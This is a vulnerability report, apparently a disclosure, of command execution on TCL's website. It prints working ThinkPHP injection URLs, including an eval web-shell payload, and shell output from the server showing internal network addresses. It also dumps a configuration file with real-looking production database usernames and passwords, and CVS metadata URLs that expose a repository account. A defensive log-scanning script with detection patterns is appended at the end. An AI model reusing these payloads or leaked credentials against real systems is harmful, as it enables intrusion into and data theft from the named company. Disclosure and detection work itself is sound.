Command execution on the TCL official website leads to getshell
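1. Command execution on the main site

This is the ThinkPHP command execution vulnerability. It has been around for this long and still is not fixed; the maintainers deserve a spanking.

http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}

Getshell directly with:

http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D

Here is a screenshot.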
Internal network information
[/var/www/html/tcl/]$ whoami
apache
[/var/www/html/tcl/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B0
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

eth1      Link encap:Ethernet  HWaddr 00:1B:21:BA:99:B2
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

eth2      Link encap:Ethernet  HWaddr 40:F2:E9:29:38:D2
          inet addr:10.4.22.72  Bcast:10.4.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0
          TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:56145622678 (52.2 GiB)  TX bytes:489393736613 (455.7 GiB)
          Memory:91580000-915a0000

Sensitive internal network information leak

Browsing through the directories turned up a lot of internal network information.

1. Lots of database account passwords leaked
<?php
switch($_SERVER["HTTP_HOST"])
{
    case "localhost:8080":
    {
        // local machine
        $db_host = "localhost";
        $db_name = "tcl";
        $db_user = 'root';
        $db_pass = 'root';
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = false;
        break;
    }
    case "10.4.21.23":
    {
        // test
        $db_host = "10.4.21.20";
        $db_name = "tcl";
        $db_user = 'tcladmin';
        $db_pass = '123456';
        $db_host_en = "10.4.21.20";
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = false;
        break;
    }
    case "10.4.21.24":
    {
        // test 2
        $db_host = "10.4.21.20";
        $db_name = "tcl";
        $db_user = 'tcladmin';
        $db_pass = '123456';
        $db_host_en = "10.4.21.20";
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = false;
        break;
    }
    case "10.4.22.72":
    {
        // production
        $db_host = "10.4.22.71";
        $db_name = "tcl";
        $db_user = 'tcl_admin';
        $db_pass = 'zpw@8b!gurvu';
        $db_host_en = "10.4.22.71";
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = false;
        break;
    }
    case "10.4.22.73":
    {
        // production 2
        $db_host = "10.4.22.71";
        $db_name = "tcl";
        $db_user = 'tcl_admin';
        $db_pass = 'zpw@8b!gurvu';
        $db_host_en = "10.4.22.71";
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = false;
        break;
    }
    default :
    {
        // production
        $db_host = "10.4.22.71";
        $db_name = "tcl";
        $db_user = 'tcl_admin';
        $db_pass = 'zpw@8b!gurvu';
        $db_host_en = "10.4.22.71";
        $db_name_en = "tcl_en";
        $cache_type = "File";
        $url_model = 2;
        $html_cache = false;
        $temp_my_cache = true;
        break;
    }
}
?>

2. As a bonus, a CVS information leak on a subdomain site

http://multimedia.tcl.com/cn/investor/CVS/Root
http://multimedia.tcl.com/CVS/Root
http://multimedia.tcl.com/en/home/CVS/Root
:sspi:mars.ho@source.loko-asia.com:2401/cvsdata

Remediation:
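1. Upgrade.
2. Change the passwords. There is no way to know whether other hackers have been here before, so they must be changed; those black-hat hackers are definitely not pushovers.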
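
One way to look for both issues from this report in web server access logs, as an added example that is not part of the original report: it flags request targets that contain a ${...} PHP expression after percent-decoding, and requests for CVS metadata files. The log lines are constructed, and the names scan, fully_decode and the rule labels are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2015:10:00:00 +0800] "GET /new/1735.html HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2015:10:00:07 +0800] "GET /new/1735.html/abc/abc/abc/${@phpinfo()} HTTP/1.1" 200 80211
203.0.113.9 - - [01/Jan/2015:10:00:09 +0800] "GET /new/1735.html/abc/abc/abc/$%7B@phpinfo()%7D HTTP/1.1" 200 80211
203.0.113.9 - - [01/Jan/2015:10:00:15 +0800] "GET /a/b/c/%2524%257Bx%257D HTTP/1.1" 404 0
198.51.100.7 - - [01/Jan/2015:10:02:00 +0800] "GET /en/home/CVS/Root HTTP/1.1" 200 48
198.51.100.7 - - [01/Jan/2015:10:03:00 +0800] "GET /index.php?s=/news/list HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# PHP complex-variable syntax in a URL: the shape of the probe in this report.
PHP_EXPR = re.compile(r"\$\{.*?\}")
# CVS working-copy metadata that should never be served from a web root.
CVS_META = re.compile(r"/CVS/(Root|Entries|Repository)$", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly (bounded) so nested encodings cannot hide '${'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return (line_no, client, rule, status) for every suspicious request."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = fully_decode(match.group("target"))
        path = target.split("?", 1)[0]
        client, status = line.split()[0], int(match.group("status"))
        if PHP_EXPR.search(target):
            findings.append((line_no, client, "php-expr-in-url", status))
        if CVS_META.search(path):
            findings.append((line_no, client, "cvs-metadata", status))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A php-expr-in-url hit answered with status 200 is the one to triage first, since it means the server processed the request rather than rejecting it.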